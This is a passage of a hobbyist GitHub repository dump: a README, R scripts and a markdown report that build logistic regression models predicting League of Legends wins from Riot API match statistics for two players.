evidence to answering these questions will help validate and clarify the model.\n\nNumerically, the final model was as follows: \n\nPredicted Probability of Winning = e^{-3.0985 - 0.0016\\*DamageTaken1020 + .0118\\*Gold1020} / (1 + e^{-3.0985 - 0.0016\\*DamageTaken1020 + .0118\\*Gold1020})\n"
},
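The two executive summaries above each end with a logistic model; plugging stats into them is a one-line computation. A minimal sketch, using the coefficients quoted in the Player T and Player A summaries; the per-minute stats fed in below are made-up illustrative inputs, not data from the match histories:

```python
import math

def win_probability(z):
    # Logistic link from the summaries: e^z / (1 + e^z)
    return math.exp(z) / (1 + math.exp(z))

def player_t_z(damage_taken_1020, gold_1020):
    # Coefficients from the Player T executive summary above.
    return -3.0985 - 0.0016 * damage_taken_1020 + 0.0118 * gold_1020

def player_a_z(damage_taken_1020, gold_1020, wards_placed):
    # Coefficients from the Player A executive summary above.
    return -4.67 - 0.005 * damage_taken_1020 + 0.0204 * gold_1020 + 0.0661 * wards_placed

# Hypothetical inputs: 400 damage taken/min, 350 gold/min, 20 wards placed.
print(round(win_probability(player_t_z(400, 350)), 3))
print(round(win_probability(player_a_z(400, 350, 20)), 3))
```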
{
"alpha_fraction": 0.7709183692932129,
"alphanum_fraction": 0.7734693884849548,
"avg_line_length": 114.29412078857422,
"blob_id": "2d17629a7fbfea7dfc3368330efd85da08a1a883",
"content_id": "73d7f1db94ca72128fa3cbe6381626cd190017d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1965,
"license_type": "no_license",
"max_line_length": 480,
"num_lines": 17,
"path": "/README.md",
"repo_name": "GabeHinton/League-Project",
"src_encoding": "UTF-8",
"text": "# League-Project\nI used Riot Games, Inc.'s public API to model player behavior and outcomes in the game League of Legends. The first project was to teach myself some Python to access Riot's public API to compile a data set of 22 variables from the past 400 or so games of a given player's match history. I used these data sets to build models to assess which variables may be useful for predicting whether the player will win or lose a match. Thank you to Riot for making the public API available.\n\nTable of Contents:\n* *Python-API-Data-Compiler* - My first python program - teaching myself from scratch to access Riot's API to compile a data set to use for building models.\n* Player T Model - Contains files related to the model built around Player T\n * *Report for Player T.md* - A report about a classification model I built using data compiled with the above Python program. \n * *Player T Analysis.R* - Here you can look at the code I wrote in R to analyze the data set and build the model discussed in this report. \n * *Executive Summary - Player T.md* - An example of a summary for executives that have less need for details and less backgrounds knowledge in statistics.\n* Player A Model - Contains files related to the model built around Player A \n * *Report for Player A.md* - A follow up report focusing on a different style of player to compare classification models. \n * *Player A Analysis.R* - The code I wrote in R to analyze the data set and build the model for this report.\n * *Executive Summary - Player A.md* - An example of a summary for executives that have less need for details and less backgrounds knowledge in statistics.\n\n\n\nThis project isn’t endorsed by Riot Games and doesn’t reflect the views or opinions of Riot Games or anyone officially involved in producing or managing League of Legends. League of Legends and Riot Games are trademarks or registered trademarks of Riot Games, Inc. League of Legends © Riot Games, Inc.\n"
},
{
"alpha_fraction": 0.6749269366264343,
"alphanum_fraction": 0.7527004480361938,
"avg_line_length": 52.121620178222656,
"blob_id": "d50c05aa2db17097f9b7ef05c5b42ddafc84c0b5",
"content_id": "9ec2e10a35755b99c0c9e26397410a70656bb84e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 7869,
"license_type": "no_license",
"max_line_length": 281,
"num_lines": 148,
"path": "/Player-T-Model/Player T Analysis.R",
"repo_name": "GabeHinton/League-Project",
"src_encoding": "UTF-8",
"text": "bizdata <- read.table(\"D:\\\\My Documents\\\\LoL Analysis Data\\\\**********_history.csv\", header=T, sep=\",\")\n\n# First I'm removing the games where he played Jungler since many of the variables I want to use aren't relevant\nbizdataedit <- bizdata[bizdata$Role != 'NONE',]\nbizdataedit\n\n# He played jungler in 54 of the past 490 ranked games, leaving 436 observations.\n\n# Now I'm removing games that lasted less than 20 minutes, and I'm going to not use the variables\n# for 20-30 minutes because it is missing so often. 10-20 is not often missing so I won't\n# lose much data.\n\nbizdataedit <- bizdataedit[is.na(bizdataedit$Creeps1020) == FALSE,]\nbizdataedit$Creeps1020\nlength(bizdataedit$Creeps1020)\n\n# This removed 6 observations, leaving 430.\n\n# For the sake of logistic regression, I need to record the winner in terms of a \n# binary success indicator: 1 = he won, 0 = he lost\n# In addition, R assumes this is a factor so I convert it to a character\n# vector and finally numeric once the numbers are in place.\n\nbizdataedit$Winner. <- as.character(bizdataedit$Winner.)\nbizdataedit$Winner. <- replace(bizdataedit$Winner., bizdataedit$Winner. == 'True', '1')\nbizdataedit$Winner. <- replace(bizdataedit$Winner., bizdataedit$Winner. == 'False', '0')\nbizdataedit$Winner. <- as.numeric(bizdataedit$Winner.)\nLost <- 1 - bizdataedit$Winner.\nbizdataedit <- cbind(bizdataedit, Lost)\n\n# Now I'm splitting the data into a random 330 observation training set, and a random 100 observation test set\n\nset.seed(227)\ntrainnums <- sample(1:430, 330)\nbiztraindata <- bizdataedit[trainnums,]\nbiztestdata <- bizdataedit[-trainnums,]\n\n# Trying a stepwise model and a manual p-value selection to see what models I come up with.\n\nmodel1 <- glm(cbind(Winner., Lost) ~ Creeps010 + Creeps1020 + DamageTaken010 + DamageTaken1020 + Gold010 + Gold1020 + SightWardsBought + TotalTimeCCDealt + VisionWardsBought + WardsKilled + WardsPlaced, data=biztraindata, family=binomial)\nsummary(model1)\n\ntestmodel1 <- step(model1)\nsummary(testmodel1)\n\ntestmodel2 <- glm(cbind(Winner., Lost) ~ Creeps1020 + DamageTaken1020 + Gold1020 + WardsKilled + WardsPlaced, data = biztraindata, family = binomial)\nsummary(testmodel2)\n\ntestmodel3 <- glm(cbind(Winner., Lost) ~ DamageTaken1020 + Gold1020 + WardsKilled + WardsPlaced, data = biztraindata, family = binomial)\nsummary(testmodel3)\n\ntestmodel4 <- glm(cbind(Winner., Lost) ~ DamageTaken1020 + Gold1020 + WardsPlaced, data = biztraindata, family = binomial)\nsummary(testmodel4)\n\ntestmodel5 <- glm(cbind(Winner., Lost) ~ DamageTaken1020 + Gold1020, data = biztraindata, family = binomial)\nsummary(testmodel5)\n\n\n# Neither is what I expected, so I brainstormed that maybe games playing as support were affecting the model, so I needed to remove the games he was support also - they're too different.\n\nbizdataedit <- bizdataedit[bizdataedit$Role != \"DUO_SUPPORT\",]\n\n# 360 games are left. 
# I create another test and training data set from this subset.\n\nset.seed(312)\ntrainnums2 <- sample(1:360, 300)\nbiztraindata2 <- bizdataedit[trainnums2,]\nbiztestdata2 <- bizdataedit[-trainnums2,]\nnewmodel1 <- glm(cbind(Winner., Lost) ~ Creeps010 + Creeps1020 + DamageTaken010 + DamageTaken1020 + Gold010 + Gold1020 + SightWardsBought + TotalTimeCCDealt + VisionWardsBought + WardsKilled + WardsPlaced, data=biztraindata2, family=binomial)\nsummary(newmodel1)\n\nnewmodel2 <- glm(cbind(Winner., Lost) ~ Creeps010 + Creeps1020 + DamageTaken010 + DamageTaken1020 + Gold010 + Gold1020 + SightWardsBought + VisionWardsBought + WardsKilled + WardsPlaced, data=biztraindata2, family=binomial)\nsummary(newmodel2)\n\nnewmodel3 <- glm(cbind(Winner., Lost) ~ Creeps010 + Creeps1020 + DamageTaken010 + DamageTaken1020 + Gold010 + Gold1020 + SightWardsBought + WardsKilled + WardsPlaced, data=biztraindata2, family=binomial)\nsummary(newmodel3)\n\nnewmodel4 <- glm(cbind(Winner., Lost) ~ Creeps010 + Creeps1020 + DamageTaken010 + DamageTaken1020 + Gold010 + Gold1020 + SightWardsBought + WardsPlaced, data=biztraindata2, family=binomial)\nsummary(newmodel4)\n\nnewmodel5 <- glm(cbind(Winner., Lost) ~ Creeps1020 + DamageTaken010 + DamageTaken1020 + Gold010 + Gold1020 + SightWardsBought + WardsPlaced, data=biztraindata2, family=binomial)\nsummary(newmodel5)\n\nnewmodel6 <- glm(cbind(Winner., Lost) ~ Creeps1020 + DamageTaken010 + DamageTaken1020 + Gold1020 + SightWardsBought + WardsPlaced, data=biztraindata2, family=binomial)\nsummary(newmodel6)\n\nnewmodel7 <- glm(cbind(Winner., Lost) ~ Creeps1020 + DamageTaken1020 + Gold1020 + SightWardsBought + WardsPlaced, data=biztraindata2, family=binomial)\nsummary(newmodel7)\n\nnewmodel8 <- glm(cbind(Winner., Lost) ~ Creeps1020 + DamageTaken1020 + Gold1020 + WardsPlaced, data=biztraindata2, family=binomial)\nsummary(newmodel8)\n\nnewmodel9 <- glm(cbind(Winner., Lost) ~ Creeps1020 + DamageTaken1020 + Gold1020, data=biztraindata2, family=binomial)\nsummary(newmodel9)\n\nnewmodel10 <- glm(cbind(Winner., Lost) ~ DamageTaken1020 + Gold1020, data=biztraindata2, family=binomial)\nsummary(newmodel10)\n\n# Surprisingly similar to the previous models. I'd better leave it here then.\n\n# Time to use the model to predict on the test data and see how accurate it is.\n\nresult2 <- predict(newmodel10, biztestdata2, type=\"response\")\nresult2[result2 >= .5] <- 1\nresult2[result2 < .5] <- 0\n\ncbind(result2, biztestdata2$Winner., result2==biztestdata2$Winner.)\nsum(result2==biztestdata2$Winner.)\n\n# It predicted 40 out of the 60 games correctly.\n\nsum(result2==1 & biztestdata2$Winner.==0)\n\nsum(result2==0 & biztestdata2$Winner.==1)\n\n# It predicted 10 losses as wins, and 10 wins as losses, which is great in one sense - we want the errors to be random, and now it seems that they are.\n\n# We can calculate a Cohen's Kappa statistic to assess whether the model is truly predicting beyond random chance.\n\nsum(biztestdata2$Winner. == 1)\n\nsum(result2 == 1)\n\n# Actual percentage of wins = .55; predicted percentage of wins = .55. .55*.55=.3025, and .45*.45=.2025.\n# So we expect the model would be right about .3025+.2025 = 50.5% of the time by random chance.\n\n# It matched 66.7% instead, so the formula for Cohen's Kappa will be:\n(.667-.505)/(1-.505) # =.327\n\n# This is a decent Cohen's Kappa, confirming that the model is correctly predicting beyond random chance\n# because .327 > 0.
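\n# As a sketch (not part of the original analysis), the Kappa arithmetic above\n# could be wrapped in a small helper so it isn't redone by hand each time:\ncohen_kappa <- function(pred, actual) {\n  p_obs <- mean(pred == actual)\n  p_exp <- mean(pred == 1) * mean(actual == 1) + mean(pred == 0) * mean(actual == 0)\n  (p_obs - p_exp) / (1 - p_exp)\n}\ncohen_kappa(result2, biztestdata2$Winner.)  # ~.327, matching the hand calculation\n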
# It isn't predicting remarkably consistently but we can discuss that in the conclusion.\n\n# Here are some useful plots:\n\nlibrary(ggplot2)\n\nggplot(data=biztraindata2, aes(Gold1020, DamageTaken1020)) + geom_point(aes(color=as.factor(Winner.))) + scale_color_manual(name=\"Outcome\", labels=c(\"Lost\", \"Won\"), values=c(\"red\", \"blue\")) +\n  labs(title=\"Plot of Significant Variables\", x=\"Gold Earned per Minute from Minutes 10 to 20\", y=\"Damage Taken per Minute from Minutes 10 to 20\")\n\n# Plot for Probability as determined by Gold1020 when DamageTaken1020 is held at its mean\nbizfunc <- exp(-3.0985 - 0.0016*mean(biztraindata2$DamageTaken1020) + .0118*c(150:715))/(1 + exp(-3.0985 - 0.0016*mean(biztraindata2$DamageTaken1020) + .0118*c(150:715)))\nbizfuncdata <- as.data.frame(cbind(bizfunc, c(150:715)))\nggplot(data=bizfuncdata, aes(c(150:715), bizfunc)) + geom_line(size=1) + labs(title=\"Predicted Probability of Winning as Gold Earned from 10-20 Changes\", x=\"Gold Per Minute from Minute 10 to 20\", y=\"Predicted Probability of Winning\") + scale_y_continuous(limits=c(0,1))\n\n# Same for DamageTaken1020\nbizfunc2 <- exp(-3.0985 - 0.0016*c(100:1300) + .0118*mean(biztraindata2$Gold1020))/(1 + exp(-3.0985 - 0.0016*c(100:1300) + .0118*mean(biztraindata2$Gold1020)))\nbizfunc2data <- as.data.frame(cbind(bizfunc2, c(100:1300)))\nggplot(data=bizfunc2data, aes(c(100:1300), bizfunc2)) + geom_line(size=1) + labs(title=\"Predicted Probability of Winning as Damage Taken from 10-20 Changes\", x=\"Damage Taken Per Minute from Minute 10 to 20\", y=\"Predicted Probability of Winning\") + scale_y_continuous(limits=c(0,1))\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6508601307868958,
"alphanum_fraction": 0.7304412722587585,
"avg_line_length": 39.75609588623047,
"blob_id": "31335d4e9a5508dac19ac4e49ad71344e355bad9",
"content_id": "9e9439f427e4efa9705bd2a52b2f93ef0a34b818",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 6685,
"license_type": "no_license",
"max_line_length": 272,
"num_lines": 164,
"path": "/Player-A-Model/Player A Analysis.R",
"repo_name": "GabeHinton/League-Project",
"src_encoding": "UTF-8",
"text": "# R Analysis - Player A\n\nrbdata <- read.table(\"D:\\\\My Documents\\\\LoL Analysis Data\\\\r****b****_history.csv\", sep=\",\", header=T)\n\n# I know this player primarily plays support so that's what I'm interested in this time.\n\nrbdata2 <- rbdata[rheyndata$Role == \"DUO_SUPPORT\",]\n\n# This leaves 224 observations remaining.\n\nrbdata2$Winner. <- as.character(rbdata2$Winner.)\nrbdata2$Winner. <- replace(rbdata2$Winner., rbdata2$Winner. == 'True', '1')\nrbdata2$Winner. <- replace(rbdata2$Winner., rbdata2$Winner. == 'False', '0')\nrbdata2$Winner. <- as.numeric(rbdata2$Winner.)\nLost <- 1 - rbdata2$Winner.\nrbdata2 <- cbind(rbdata2, Lost)\n\n# I'm going to remove games that lasted less than twenty minutes\n\nrbdata2 <- rbdata2[is.na(rbdata2$Creeps1020) == FALSE,]\n\n# That only removed two observations (which is good, I was expecting it to be low)\n# so there are now 222 remaining.\n\n# I'm going to split the data into 180 observations for training the model and 42 observations for testing it.\n\nset.seed(317)\ntrainnums <- sample(1:222, 180)\nrbtraindata <- rbdata2[trainnums,]\nrbtestdata <- rbdata2[-trainnums,]\n\n# Let's look at two more vectors\n\nrbdata2$Creeps010\nmean(rbdata2$Creeps010)\nrbdata2$Creeps1020\nmean(rbdata2$Creeps1020)\n\n# On average Player A is getting a creep score of 1 or 2 in the first ten minutes\n# and an additional 3 in minutes 10 to 20. Not per minute, just the total creeps\n# across the time span. This is so meaninglessly low it would not be wise to include\n# this in the model either.\n\n# Time to try a model\n\nmodel1 <- glm(cbind(Winner., Lost) ~ DamageTaken010 + DamageTaken1020 + Gold010 + Gold1020 + SightWardsBought + TotalTimeCCDealt + VisionWardsBought + WardsKilled + WardsPlaced, data=rbtraindata, family=binomial)\nsummary(model1)\n\nmodel2 <- update(model1, . ~ . -SightWardsBought)\nsummary(model2)\n\nmodel3 <- update(model2, . ~ . -WardsKilled)\nsummary(model3)\n\nmodel4 <- update(model3, . ~ . -VisionWardsBought)\nsummary(model4)\n\nmodel5 <- update(model4, . ~ . -DamageTaken010)\nsummary(model5)\n\nmodel6 <- update(model5, . ~ . -Gold010)\nsummary(model6)\n\nmodel7 <- update(model6, . ~ . -TotalTimeCCDealt)\nsummary(model7)\n\ntestmodelstep <- step(model1) # Stepwise method matched Model 6\nsummary(testmodelstep)\n\n\n# I'm now debating a bit between between the stepwise model and Model 7.\n# I'm going to use both to predict on the test data set and see which one performs better.\n\n\n# For Model 7:\n\nresult7 <- predict(model7, rbtestdata, type=\"response\")\nresult7[result7 >= .5] <- 1\nresult7[result7 < .5] <- 0\n\nsum(result7==rbtestdata$Winner.)\n\n# It predicted 35 out of 42 games correctly.\n\nsum(result7==1 & rbtestdata$Winner.==0)\n\nsum(result7==0 & rbtestdata$Winner.==1)\n\n# It incorrectly predicted 4 games that were actually losses and\n# 3 games that were actually wins. This is reasonably evenly spread.\n\nsum(result7==1 & rbtestdata$Winner.==1)\n\nsum(result7==0 & rbtestdata$Winner.==0)\n\n# Of the correctly predicted games, 28 were wins and 7 were losses.\n# But that means there were 31 wins and 11 losses in the test data by random\n# chance, so that doesn't worry me. We can calculate Cohen's Kappa to\n# compensate for this.\n\n# Actual percentage of wins = .74; predicted percentage of wins = .67. 
# .74*.67 = .496, and .26*.33 = .086.\n# So we expect the model would be right about .496+.086 = 58% of the time by random chance.\n\n# It matched 83% instead, so the formula for Cohen's Kappa will be:\n(.83-.58)/(1-.58) # = .5952\n\n\n# For the Stepwise Model:\n\nresultstep <- predict(testmodelstep, rbtestdata, type=\"response\")\nresultstep[resultstep >= .5] <- 1\nresultstep[resultstep < .5] <- 0\n\nsum(resultstep==rbtestdata$Winner.)\n\n# It predicted 35 out of 42 games correctly.\n\nsum(resultstep==1 & rbtestdata$Winner.==0)\n\nsum(resultstep==0 & rbtestdata$Winner.==1)\n\n# It incorrectly predicted 3 games that were actually losses and\n# 4 games that were actually wins. This is reasonably evenly spread.\n\nsum(resultstep==1 & rbtestdata$Winner.==1)\n\nsum(resultstep==0 & rbtestdata$Winner.==0)\n\n# Of the correctly predicted games, 27 were wins and 8 were losses.\n# But that means there were 31 wins and 11 losses in the test data, so even\n# a guesser leaning toward wins would score well by chance. We can calculate\n# Cohen's Kappa to compensate for this.\n\n# Actual percentage of wins = .74; predicted percentage of wins = .643. .74*.643 = .476, and .26*.357 = .093. So we expect the model would be right about .476+.093 = 57% of the time by random chance.\n\n# It matched 81% instead, so the formula for Cohen's Kappa will be:\n(.81-.57)/(1-.57) # = .5581\n\n# Here are some helpful graphs.\n\nlibrary(ggplot2)\n\nggplot(data=rbtraindata, aes(Gold1020, DamageTaken1020)) + geom_point(aes(color=as.factor(Winner.), size=WardsPlaced)) + scale_color_manual(name=\"Outcome\", labels=c(\"Lost\", \"Won\"), values=c(\"red\", \"blue\")) +\n  scale_size_continuous(range=c(0,8))\n\nmean(rbtraindata$WardsPlaced[rbtraindata$Winner.==1])\nmean(rbtraindata$WardsPlaced[rbtraindata$Winner.==0])\n\n# Function for probability regarding WardsPlaced with others at mean\nfunc1 <- exp(-4.674-.005002*mean(rbtraindata$DamageTaken1020)+.020411*mean(rbtraindata$Gold1020)+.066109*c(1:50))/(1 + exp(-4.674-.005002*mean(rbtraindata$DamageTaken1020)+.020411*mean(rbtraindata$Gold1020)+.066109*c(1:50)))\nwardvalue <- c(1:50)\nfunc1data <- as.data.frame(cbind(func1, wardvalue))\nggplot(data=func1data, aes(wardvalue, func1)) + geom_line(size=1) + labs(title=\"Predicted Probability of Winning as Wards Placed Changes\", x=\"Wards Placed\", y=\"Predicted Probability of Winning\") + scale_y_continuous(limits=c(0,1))\n\n# Same for Gold1020\nfunc2 <- exp(-4.674-.005002*mean(rbtraindata$DamageTaken1020)+.020411*c(100:450)+.066109*mean(rbtraindata$WardsPlaced))/(1 + exp(-4.674-.005002*mean(rbtraindata$DamageTaken1020)+.020411*c(100:450)+.066109*mean(rbtraindata$WardsPlaced)))\nfunc2data <- as.data.frame(cbind(func2, c(100:450)))\nggplot(data=func2data, aes(c(100:450), func2)) + geom_line(size=1) + labs(title=\"Predicted Probability of Winning as Gold Earned from 10-20 Changes\", x=\"Gold Per Minute from Minute 10 to 20\", y=\"Predicted Probability of Winning\") + scale_y_continuous(limits=c(0,1))\n\n# Same for DamageTaken1020\nfunc3 <- exp(-4.674-.005002*c(0:900)+.020411*mean(rbtraindata$Gold1020)+.066109*mean(rbtraindata$WardsPlaced))/(1 + exp(-4.674-.005002*c(0:900)+.020411*mean(rbtraindata$Gold1020)+.066109*mean(rbtraindata$WardsPlaced)))\nfunc3data <- as.data.frame(cbind(func3, c(0:900)))\nggplot(data=func3data, aes(c(0:900), func3)) + geom_line(size=1) + labs(title=\"Predicted Probability of Winning as Damage Taken from 10-20 Changes\", x=\"Damage Taken Per Minute from Minute 10 to 20\", y=\"Predicted Probability of Winning\") + 
scale_y_continuous(limits=c(0,1))\n\n"
},
{
"alpha_fraction": 0.7392192482948303,
"alphanum_fraction": 0.7675675749778748,
"avg_line_length": 117.0851058959961,
"blob_id": "921ee39015b2f9860bda2d5cfda9687974f00e83",
"content_id": "c35a37f0489f0d4d24155e686650cd18e49dddf2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 16650,
"license_type": "no_license",
"max_line_length": 1207,
"num_lines": 141,
"path": "/Player-A-Model/Report for Player A.md",
"repo_name": "GabeHinton/League-Project",
"src_encoding": "UTF-8",
"text": "#League of Legends Project - Player A Analysis\n#####Gabe Hinton\n\nSummary\n=======\n\nAfter creating a logistic regression model to predict whether Player T would win or lose a game of League of Legends as Top, Mid, or ADC role, this analysis was done to focus on a player who primarily plays support (called Player A) to see how similar or different a model predicting the outcomes of his games would be to that of Player T's. This gives insight into the extent to which the model can be expected to generalize to more players. Ideally, if higher quality models (with respect to predictive power) are able to be formed, players could use them as a tool to assess areas for improvement specific to their role, champion, or team. Thanks to Riot Games, Inc. for having a public API making data collection for this analysis possible.\n\nA logistic model was formed starting with a long list of variables - the same as for Player T, except Creeps010 and Creeps1020 were omitted because intuitively they do not make much sense for a support. Furthermore the specific observed values for Player A's creep scores also don't make much sense for prediction because they were consistently below 5 for each ten minute chunk.\n\nAs before, there are notable limitations on this analysis. League of Legends is first and foremost a team game so any model looking at the behaviors and statistics of only one player is limited in scope. In addition, the model does not necessarily imply causation, because for example gold can be earned in a variety of ways, so one must wonder whether gold predicting a victory or loss does so because of the items Player A can purchase with the gold, or because of the actions he performed that earned him the gold put his team in a better position to win the game. Similarly, the number of wards he places would be impacted by how long the game is, which is not accounted for in this analysis.\n\nIn addition, the observations for Player A cover a longer range of his total time as a player of League than Player T, so nothing is built into the model to account for Player A's skill continuing to increase over time, so that also becomes a lurking variable that could be considered in a future analysis.\n\nIn the end, the clear predictors of the outcome were Gold1020 and DamageTaken1020, the two variables in the final model for Player A, as well as WardsPlaced, which was a nice confirmation of intuition about the importance of map vision in a game of LoL. The final model was:\n\nPredicted Probability of Winning the Game = e^{-4.67 - .005\\*DamageTaken1020 + .0204\\*Gold1020 + .0661\\*WardsPlaced} / (1 + e^{-4.67 - .005\\*DamageTaken1020 + .0204\\*Gold1020 + .0661\\*WardsPlaced})\n\nIn closing, perhaps aside from placing wards and disarming enemy players with crowd control abilities the first ten minutes of the game again seem to be poor predictors of the game outcome, as with Player T. One wonders though about the variables regarding gold and damage taken in minutes 10 to 20 showing up again - this may perhaps provide more evidence that these variables are just reflections of Player A and T's skills like good team fight engagement positioning and number of kills, rather than suggesting they should actively forsake other activities to get more gold and take less damage in order to win the game. Placing wards seems to clearly be an important factor in winning games to improve map vision for Player A. 
On the other hand, perhaps he is more likely to remember to continue placing wards in games that his team is currently winning. In short, there are some interesting conclusions, and plenty of room for further exploration and model building. Some possible paths to look into include separating gold from creep farming and gold from kills to try to reduce lurking variables, and building models that account for these variables across an entire team instead of a single player.\n\nObjectives\n==========\n\nTo avoid repetition, it is recommended you read the analysis of Player T first for an explanation of logistic regression and the intention of that analysis. This analysis is a follow-up to that one, in that Player T primarily plays Top, Mid, and ADC, while this analysis's subject, Player A, mainly plays support. The goal is to find whether a similarly built logistic model to predict victory or loss in a game using data from a support player looks similar or very different to the model for Player T.\n\nData Summary\n============\n\nPlayer A has not played as many games as Player T, so the API was used to search for the past 360 ranked games of Player A and data was pulled for a variety of variables from each of those games. The variables are as follows:\n\nChampion: An identification number for the character Player A chose to play as for that match \nCreeps010: The number of creeps Player A killed per minute across the first ten minutes of the match \nCreeps1020: The number of creeps Player A killed per minute from minute ten through twenty \nCreeps2030: The number of creeps Player A killed per minute from minute twenty through thirty \nDamageTaken010: The amount of damage Player A received per minute during the first ten minutes of the match \nDamageTaken1020: The amount of damage Player A received per minute from minute ten to twenty \nDamageTaken2030: The amount of damage Player A received per minute from minute twenty to thirty \nGold010: The amount of gold Player A earned per minute during the first ten minutes of the match \nGold1020: The amount of gold Player A earned per minute from minute ten to twenty \nGold2030: The amount of gold Player A earned per minute from minute twenty to thirty \nLane: The team \"position\" Player A played during the match \nMatchID: A number string identifying the match in Riot's API \nNeutralMinionsKilled: The number of neutral minions Player A killed throughout the game \nNeutralMinsEnemyJungle: The number of neutral minions Player A killed in enemy territory \nNeutralMinsTeamJungle: The number of neutral minions Player A killed in his own team's territory \nRole: \"Solo\" - mid or top lane as according to Lane; \"None\" - he played the \"Jungle\" role; \"Duo\\_Carry\" - ADC; \n \"Duo\\_Support\" - Support \nSightWardsBought: The number of sight wards Player A bought throughout the game \nTotalTimeCCDealt: The sum of all seconds an enemy player was stuck in a \"crowd control\" ability by Player A \nVisionWardsBought: The number of vision wards Player A bought throughout the game \nWardsKilled: The number of enemy wards Player A destroyed throughout the game \nWardsPlaced: The number of wards of any type Player A placed throughout the game \nWinner.: 1 if Player A's team won the game, 0 otherwise \nLost: 1 if Player A's team lost the game, 0 otherwise \n\nAs before, certain additional variables could have been pulled from Riot's API but were deliberately omitted.
While variables such as Kills, Assists, Inhibitor Kills, and Damage Dealt could each perhaps do a notable job of predicting whether Player A was the winner or loser, they are not very useful to the intent of the analysis. As a match in League of Legends nears its end, the team that ultimately wins typically gains momentum and begins to accumulate more kills, assists, and inhibitor kills than the team that loses. It seems highly likely that these variables can predict the winner, but that is because these are specifically the actions that cause a team to win in the first place. The goal of this analysis is to find player behaviors that less obviously could push a team to victory, as well as look at behavior that focuses more specifically on the early game through the API's time designations (\"010\", \"1020\", and \"2030\" variables.)\n\nChampion, MatchID, Role, and Lane were all collected as a means of sorting data and were not actually included in the model. Role and Lane could certainly have been included to explore interaction effects, and there would be value in doing so in a future analysis. For a preliminary exploratory analysis, they were omitted for simplicity's sake.\n\nRather than omitting support and jungle observations as done with Player T, background knowledge of Player A indicated that he primarily plays the support role, so all roles except support were removed. As with Player T, the few games that end before twenty minutes were also removed since they throw an unnecessary wrench into trying to view patterns among typical games. This left 222 observations to work with.\n\nFinally, the data was divided into 180 observations randomly selected to be a training data set to build the model, and the remaining 42 observations served as a test data set to assess how well the model could predict outcomes.\n\nAnalysis\n========\n\nAs mentioned previously, the analysis for Player T provides a more thorough background of the modeling method used. In short, the model is a logistic regression using values for the predictor variables to predict a probability of a binary response, in this case winning or losing the game.\n\nThis time there was no need for intuition in determining the order of variables removed; they all fell into place rather logically. An alpha value of .05 was used again as the acceptable probability of an incorrect conclusion.\n\nFollowing this procedure, the model reached was as follows:\n\n    ## \n    ## Call:\n    ## glm(formula = cbind(Winner., Lost) ~ DamageTaken1020 + Gold1020 + \n    ##     WardsPlaced, family = binomial, data = rbtraindata)\n    ## \n    ## Deviance Residuals: \n    ##     Min       1Q   Median       3Q      Max  \n    ## -2.4035  -0.8944   0.4450   0.8736   1.6604  \n    ## \n    ## Coefficients:\n    ##                  Estimate Std. Error z value Pr(>|z|)    \n    ## (Intercept)     -4.674429   1.262221  -3.703 0.000213 ***\n    ## DamageTaken1020 -0.005002   0.001436  -3.483 0.000495 ***\n    ## Gold1020         0.020411   0.003928   5.197 2.03e-07 ***\n    ## WardsPlaced      0.066109   0.028024   2.359 0.018322 *  \n    ## ---\n    ## Signif. codes:  0 '***' 0.001 '**' 0.01 '*' 0.05 '.' 0.1 ' ' 1\n    ## \n    ## (Dispersion parameter for binomial family taken to be 1)\n    ## \n    ##     Null deviance: 245.16  on 179  degrees of freedom\n    ## Residual deviance: 192.80  on 176  degrees of freedom\n    ## AIC: 200.8\n    ## \n    ## Number of Fisher Scoring iterations: 4\n\nSo we see that the three significant variables are WardsPlaced, DamageTaken1020, and Gold1020.
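\nAs a quick worked example (a sketch with hypothetical input values, not figures taken from the data), these coefficients convert to a predicted probability in R as follows:\n\n    # Hypothetical game: 500 damage taken/min, 300 gold/min, 20 wards placed\n    log_odds <- -4.674429 - 0.005002*500 + 0.020411*300 + 0.066109*20\n    plogis(log_odds)  # converts log-odds to probability; about 0.57 here\n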
The roles of these three variables become reasonably intuitive when they are plotted:\n\n\n\nBlue points are games that Player A won, and red points are games he lost. The size of the point is based on how many wards he placed in that game. We can see a trend that more wins (blue points) are found as we go further down and to the right on the plot, exactly as we expect. (Remember that smaller values of Damage Taken are preferred.) There are exceptions at the extremes, and more of a mix of points around the middle of the plot, which is also expected. There are a multitude of variables not considered in the analysis, so we do not expect to be able to predict perfectly and account for all variation.\n\nRecall that the primary output is in terms of \"log-odds\", which when taken as the power of mathematical *e* produces odds, the ratio of probability of success divided by probability of failure. With this in mind, the model coefficient (under the column Estimate in the table) when taken as the power of mathematical *e* produces the multiplicative change in odds for an increase of one in the corresponding variable, assuming all the other predictor variables are held at a constant value. Using all of this, we can interpret this model. \n\nFor an increase of 1 damage taken per minute during minutes 10 to 20, the predicted odds that Player A will win the game are multiplied by *e^-.005 = .995*. If it increases by 10, then the odds are multiplied by .95. We can interpret this as probability with a bit more math: *Probability = Odds / (1 + Odds)*. If we plug the means of all the other variables into the formula and calculate the result at each point on the range of DamageTaken1020, we can graph how the predicted probability of winning changes as DamageTaken1020 changes. The axis for damage taken will only cover the range observed in the data to avoid drawing bad conclusions by assuming behavior not actually seen.\n\n\n\nAgain, note that this graph is only specific to when WardsPlaced and Gold1020 are at their average level. The general trend will be similar for most values, however.\n\nIncreasing his average gold per minute for minutes 10 to 20 by 1 multiplies his odds of winning by *e^.0204 = 1.02*. If he increases it by 100 (meaning he improves his total gold across minutes 10 to 20 by 1000), his predicted odds of winning are multiplied by *e^{2.04} = 7.69*. \n\nWe can similarly build a plot for how the predicted probability of winning changes as gold per minute from minutes 10 to 20 changes by plugging in the means for DamageTaken1020 and WardsPlaced.\n\n\n\nFinally, for each individual ward he places during a match, his predicted odds of winning are multiplied by *e^.0661 = 1.07*. And once again, by holding DamageTaken1020 and Gold1020 at their means, a plot can be graphed of how the number of wards placed changes the predicted probability of winning.\n\n\n\nNext the test data set was placed into this model to see how well the model would do at predicting the 42 known outcomes. The results were as follows:\n\n| | Model Predicts Victory | Model Predicts a Loss |\n|----------------|------------------------|-----------------------|\n| Actual Victory | 28 | 3 |\n| Actual Loss | 4 | 7 |\n\n35 out of 42 correct predictions is fantastic, and the incorrect predictions are nearly evenly split, suggesting the errors can be considered random. This seems like a highly successful model.
